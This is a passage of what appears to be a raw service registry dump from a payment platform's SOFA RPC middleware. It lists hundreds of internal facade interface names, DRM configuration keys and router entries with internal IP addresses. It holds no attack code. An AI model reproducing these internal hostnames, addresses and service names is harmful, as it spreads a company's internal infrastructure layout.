FA.CONFIG","com.alipay.finvirtualta.core.service.yeb.repository.FinvtDistributeLockRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.SecurityQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.UserQualificationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.policysearch.component.ZSearchQueryComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antqRatio_TP_SECURITY_DATAACCESS,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_O_PROCESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cashbook.core.service.event.router.InnerEventTrDispatcher:1.0:innerEventTrDispatcherService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.wishsavings.WishSavingsFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:112@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.SysConfigManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mrchcommercelab@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finbatch@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promoitem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.picasso.common.service.facade.slogan.SmartSloganService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.openplatform.facade.optlog.api.OptLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.neardata.query.service.CategoryQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitydatacore.common.service.facade.AccountManagementOnlineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.UserAgreementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_FINCOMPOSE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icfmng.common.service.facade.api.BatchVoucherQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.feeclcn.common.service.facade.FeeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipHvpsResource.invokeTaskStatusChange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echo.platform.playback.service.EchoPlaybackService:1.0:instfluxdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.pbc.PbcBankCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkInitMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.YebFreezeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcSyncEventActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.xb.XbCrowdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csaccurate.service.facade.api.AccurateMatcherService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.RiskFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_MFINSNSPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetswap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.comparacenter.common.service.facade.publish.DataItemPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountcore.common.service.facade.DiscountTicketQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementHistoryQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:payflux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliHeartBeatFacade:1.0:mobileha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.drm.AddUserInfoToDrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-29#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_P_DPC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpwm.facade.service.CapitalPlanProductAbilityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_OYZ_DATA_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.190.170#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opencore.service.facade.platform.PlatformAppManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.BelongToConsistQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.message.template.MessageTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.ReconInstQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.base.info.merchant.facade.TagDefinitionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodecSitecodeRegexRuleWriteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.TlouBizTagConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.forum.ForumManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.DingTalkRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promocore.common.service.facade.CampConsultiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:instportalmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPERATOR#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdac.microservice.smsscore.facade.SmsScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.MerchantOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingBizSumResultApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.PromoMiniLoanBenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.247.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadvisorprod.common.service.facade.api.AssetInventoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue27#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.accenter.service.facade.api.TaxCoreTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.achelmetcore.common.service.facade.SecurityRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:kbbp_notify_merchant_audit_bPProcessCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditauthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CONTENTFACTORY#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchorder.common.service.facade.order.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.166.253.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.dataphin.dpmetaportal.common.facade.api.DpBpmsCallbackApi:1.0:dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.196.95#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ebppgw.facade.mng.QueryConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.AssetPoolQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.AuditLogManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.api.GoldBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.superapiGzoneTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.132.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.160.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inspectprod.common.service.trigger.inspect.CCtrlInspectTrigger:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.bizservice.facade.AccessTokenAliasQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.ChannelMigrateParamDrmResoureInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfaccounting@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.miniappevaluation.MiniAppEvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.252.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ideploy.common.service.facade.DeployDispatchDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.common.service.integration.mobileops.AlarmAnalysisFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.biz.open.api.facade.CommonQueryModelSZ:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.iad.facade.ChannelAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.common.service.facade.channel.ChannelTemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.tradeapcore.tradeapcore_ds.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adbizopt.common.service.facade.transfer.MakePriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.test.OrderRefundFacadeWSTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.searchSingleWord,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.cfpcenter.common.service.facade.api.ecm.EcmCrossSubjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.apply.AssetApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_WITHDRAW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.aipPromoPackVoucherMaxOverPublishRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:create_online_template_handler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.FinFundCompanyManagerSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditrmp.facade.taskmanage.PcreditTaskRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditutcore.common.service.facade.AccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.3.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minicenter.common.service.facade.api.version.MiniAppVersionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.RefundCriteriaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.task.TaskRewardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.core.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.modelcenter.common.service.model.sm.SimpleModelVerifyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmatrix.common.service.facade.MatrixEddServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ExperienceAlarmRecheckDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.SceneMapManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.market.SocialItemOnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:koa-patch#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_SECURITYDATA_SECURITYDATACBACKEND#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:morderprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.promocenter.facade.api.prototype2.ActivityInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileic.common.service.facade.product.spi.SecurityProductFacade:1.0:bis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.fintradecenter.FintradeRefundOrderQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.ProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.okcourse.service.OkReceiveCardMoblieService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.core.coordinate.CustomerAssetTimerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.aciaasconnectorcore.facade.conn.ComputeConn:1.0:0000000001@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.103.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instanalysis.common.service.facade.indicator.IndicatorReadService:1.0:instanalysis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.common.service.facade.reimbursement.api.ReimZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antgraph.facade.service.simulation.GraphSimulationConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.qa.QaHandlerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITTRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:plugincenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1215#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloaninsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.tripprom.client.TrippromAntAbroadAPI:1.0:1.0.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:moxiTest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.3.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.overseamng.rate.pms.OverseaPromotionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-43#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.core.service.repository.InstSignApplyRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_B_AIR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.180.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_RCCONSULTCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaserver.facade.PvSofaService:1.0:gzone@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.topic.isTopicDetailDowngradeVoting,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:promoLayerCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscenter.service.knowledge.facade.KnowledgeQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.AlipaySoftModleServiceFacade:1.0:cryptcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautoagent.common.telworkbench.AutoInsCompanyAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.purPerPaySettleInfoConstructSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.159.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pricemng.common.service.facade.api.price.PriceSyncFacade:1.0:priceSitSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.ugw.UnifygwServiceFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_6400#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.uctLogStorePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cloud.apfasmng.common.service.facade.appinstancegroupversion.AppInstanceGroupVersionFacade:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchiscore.common.service.facade.mprotal.PayXAbilityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.ps.rpc.facade.team.TeamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","abilitycore@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ccr.RepayPeriodConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:minigameSecurityAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.validator.impl.ValidatorConfigDRMResource.validUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.shop.CategoryManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityMyDonatedItemQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:pclbStrategyRelationConfigController@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.forceFundStatusCheckUserIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crmhome.common.service.facade.api.hotrecommend.HotRecommendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhubalipay.facepay.facade.FacePayInitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpromocore.common.service.facade.BenefitInvalidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradequery:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataModelWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.pyxis.facade.DictOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.college.materialtag.MaterialTagFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:livetradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mwalletmng.contentfusionConfigDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.limitRatio,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revol.core.service.facade.ScriptChecker:1.0:bizcertifyrule@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.resourceitem.ImageRIManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abnclprod.facade.taskflow.api.mobile.AbnTaskRpcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.LoanRepayConfigDrm.oacWithdrawSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zcore.facade.doc.ZDocService:1.0:zcorealipayidcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antpim.common.service.facade.catalog.BuCatalogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.extension.BundleVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.promo.service.task.CommonTaskTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopPictureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.api.AdvisorAssignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.EdeductBillInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.entity.EntityDsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.ReportDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.CollectReceiptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaChangeRecordCountDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.McenterAirExtDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.process.ProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.CustomerTagService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iintegration.common.service.facade.api.IntegrationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackServ